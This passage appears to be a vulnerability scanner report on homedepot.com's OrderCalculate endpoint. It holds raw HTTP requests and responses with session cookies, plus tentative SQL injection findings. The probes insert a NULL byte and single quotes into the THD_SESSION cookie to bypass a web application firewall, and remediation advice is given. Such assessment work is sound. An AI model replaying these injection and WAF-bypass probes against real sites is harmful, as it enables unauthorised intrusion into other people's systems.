s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1 (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Expires: Thu, 16 Jun 2011 12:05:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:05:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308225936626%3a%3bC25%5fEXP%3d1360065936%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:05:36 GMT;Path=/
Set-Cookie: WC_PERSISTENT=ms8azYnsw2wEElsVhU3vMb27om8%3d%0a%3b2011%2d06%2d16+08%3a05%3a36%2e628%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:09:04 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308229536628%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cIyrrsZiSciFarvpfmb5Ol137PrA%3d;Domain=.homedepot.com;Path=/
Content-Length: 285322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


...[SNIP]...
<a href="http://www.homedepot.com/webapp/wcs/stores/servlet/THDStoreFinder?storeId=10051&URL=StoreFinderViewDetails&errorViewName=StoreFinderView&headerStoreFinder=&List=List&catalogId=10053&zip='+ getTHDStoreZip() + '&distance_1=50&city=&state_1=&distance_2=50&store=" class="storeFinder-dropdwn" onclick="s_objectID=\'He
...[SNIP]...
e;
            // Modified for Requirement THD_WCS_009 - Commented the below line
            //document.getElementById(editZipFormId).submit();            
        }
           }
           else {
               alert('Invalid Zip Code');
        // Added below 2 lines for Requirement THD_WCS_009 - Start
               busy = false;
               return false;                
           }
       }
       busy = false;
    // Added below line for Requirement THD_
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388%2527%2527; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 12:05:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:05:41 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308225940857%3a%3bC25%5fEXP%3d1360065940%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:05:40 GMT;Path=/


1.67. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [THD_SESSION cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The THD_SESSION cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the THD_SESSION cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%00'; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 12:01:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:01:58 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308225713377%3a%3bC25%5fEXP%3d1360065713%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:01:53 GMT;Path=/
Set-Cookie: THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1%3a%3bC6%3d%7b%22I1%22%3a%22216%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24303%2c184%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d%2d1;Domain=.homedepot.com;Path=/
Set-Cookie: WC_PERSISTENT=UopgfbPd%2fmEDQfcSlDPV6CnKqYg%3d%0a%3b2011%2d06%2d16+08%3a01%3a54%2e903%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:05:22 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308229314903%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2c65as3nloeuUkFpo3rPEkV2KC330%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%00''; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 12:01:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:01:59 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308225718513%3a%3bC25%5fEXP%3d1360065718%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:01:58 GMT;Path=/


1.68. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [URL parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The URL parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the URL parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

